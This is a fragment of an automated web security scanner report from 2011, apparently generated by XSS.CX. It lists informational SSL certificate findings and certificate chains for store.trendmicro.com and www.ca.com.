HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"74-1314988493664" Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT Content-Length: 74 Date: Tue, 06 Sep 2011 18:55:51 GMT GIF89a.......DDD...!.......,..........!.......d.:..L.Q.m.......Y.U.:r5s..;
22. SSL certificate
previous
There are 2 instances of this issue:
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed. It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
22.1. https://store.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: store.trendmicro.com Issued by: VeriSign Class 3 Secure Server CA - G3 Valid from: Sun Apr 10 18:00:00 GMT-06:00 2011 Valid to: Tue Apr 10 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
22.2. https://www.ca.com/
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: www.ca.com Issued by: VeriSign Class 3 Secure Server CA - G3 Valid from: Mon Oct 11 18:00:00 GMT-06:00 2010 Valid to: Wed Oct 12 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 Secure Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Wed Jul 16 17:59:59 GMT-06:00 2036
Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011.